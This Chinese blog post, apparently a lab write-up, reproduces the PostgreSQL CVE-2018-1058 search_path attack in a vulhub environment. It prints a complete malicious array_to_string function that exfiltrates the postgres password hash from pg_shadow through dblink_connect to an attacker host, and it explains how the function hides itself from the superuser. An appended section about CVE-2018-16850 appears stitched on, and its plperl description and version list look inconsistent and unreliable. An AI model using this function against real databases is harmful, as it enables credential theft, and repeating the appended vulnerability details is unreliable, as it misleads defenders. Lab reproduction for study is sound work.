【vulhub】PostGresql远程代码执行漏洞复现(CVE-2018-1058)

上一篇文章提到的知识就是为了此漏洞复现时对其攻击过程恶意构造有更好的理解。

该漏洞影响到的版本:PG < 10。

复现的大体流程是:以一个普通用户登录在public中写入一个恶意的函数,通过修改publicpg_catalog的先后调用顺序导致超级用户利用自己的高权限调用自以为是正常的恶意函数最后触发恶意内容。

漏洞复现

这里模拟出一个普通用户(账号:vulhub 密码:vulhub),登录进去。 

然后创建一个恶意函数array_to_string()

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=your_ip_address port=5432 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

这里解释一下上面的代码含义,第一行很简单,定义一个public模式下的函数,函数名与参数类型和个数都不能修改(保证与pg_catalog中的函数名相同),至于为什么要用这个函数,这里借用一个师傅文章的图片。

这个漏洞主要是pg_dump备份时会产生search_path的动态改变,这样则会导致一些本应该pg_catalog模式中的函数触发,一旦public中也存在就会触发public中的,上面这张图时pg_dump备份后bak文件中的数据,可以看到有个array_to_string()没有指定schema,至于他在相同模式中的定义为:

第二行用的dblink_connect()可以外带数据,类似于DNSLog注入时带出的数据(但原理不相同)。

第三行代码其实有和无没关系,主要是构造了一个恶意的函数,再在后面把正常的功能还原以便不影响到函数本身的功能而被超级用户发觉。

第四行结尾,固定格式。注意VOLATILE是一个状态,PG中有三个状态:IMMUTABLESTABLEVOLATILE(非常稳定、稳定、不稳定)。不稳定可以对数据库中的内容进行修改,其它的两个感兴趣的可以自己百度搜索了解。

最后我们测试一下:

设置完函数再对端口进行监听,最后进入docker环境模拟登录超级用户,对vulhub进行备份

最后监听到了一串MD5加密的密码 。

参考:PostgreSQL 远程代码执行漏洞分析及利用—【CVE-2018-1058】 - SecPulse.COM | 安全脉搏

### PostgreSQL CVE-2018-16850 SQL 注入漏洞详情与解决方案 #### 漏洞描述 CVE-2018-16850 是一个存在于 PostgreSQL 的扩展 `plperl` 中的安全漏洞。该漏洞允许攻击者通过精心构造的输入,在启用了 PL/Perl 扩展的情况下执行任意代码,从而实现远程命令执行或数据泄露。 此漏洞的根本原因在于 `plperl` 处理某些特殊字符的方式不当,使得恶意用户能够绕过预期的安全检查并注入恶意 Perl 代码[^1]。 #### 影响版本 受影响的 PostgreSQL 版本包括但不限于: - PostgreSQL 9.4.x 到 9.4.23 - PostgreSQL 9.5.x 到 9.5.17 - PostgreSQL 9.6.x 到 9.6.13 - PostgreSQL 10.x 到 10.8 #### 解决方案 为了防止利用此漏洞,建议采取以下措施之一来修复系统: 1. **升级到安全版本**:最直接的方法是将 PostgreSQL 升级至不受影响的新版本。官方已经发布了针对不同分支的安全更新包。 2. **禁用 PL/Perl 扩展**:如果应用程序不需要使用 PL/Perl 功能,则可以选择完全移除或禁用这个扩展模块。这可以通过运行如下 SQL 命令完成: ```sql DROP EXTENSION IF EXISTS plperl; ``` 3. **应用补丁程序**:对于无法立即进行全面升级的情况,可以单独安装由供应商提供的针对性补丁文件。 4. **加强权限管理**:即使存在潜在风险点,合理配置数据库用户的最小化权限原则也能有效降低被成功攻击的概率。确保只有可信账户才拥有创建或修改函数的权利[^2]。 ```python import psycopg2 def check_plperl_extension(): conn = None try: conn = psycopg2.connect("dbname=test user=postgres password=secret") cur = conn.cursor() cur.execute(""" SELECT extname FROM pg_extension WHERE extname='plperl'; """) result = cur.fetchone() if result: print(f"PL/Perl extension is enabled.") else: print(f"PL/Perl extension is not found.") except Exception as e: print(e) finally: if conn is not None: conn.close() check_plperl_extension() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

errorr0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值